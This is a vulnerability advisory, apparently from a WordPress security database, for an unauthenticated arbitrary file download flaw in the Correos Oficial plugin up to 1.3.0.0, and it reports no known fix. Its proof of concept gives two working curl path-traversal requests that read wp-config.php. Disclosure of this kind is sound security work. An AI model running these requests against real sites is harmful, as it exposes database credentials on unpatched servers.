WordPress Plugin Vulnerabilities

Correos Oficial <= 1.3.0.0 - Unauthenticated Arbitrary File Download

Description

The plugin does not have an authorization check user input validation when generating a file path, allowing unauthenticated attackers to download arbitrary files from the server.

Proof of Concept

Dependency: WooCommerce plugin

Use the following curl command to download the contents of the wp-config.php file:

curl -i 'https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=../../..&filename=wp-config.php' 

or

curl -i 'https://example.com/wp-content/plugins/correosoficial/descarga_etiqueta.php?path=..&filename=/../../wp-config.php' 

Affects Plugins

No known fix

References

Classification

Type
FILE DOWNLOAD
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
Andrea Iodice
Submitter
Andrea Iodice
Verified
Yes

Timeline

Publicly Published
2023-01-31 (about 1 years ago)
Added
2023-01-31 (about 1 years ago)
Last Updated
2023-02-01 (about 1 years ago)

Other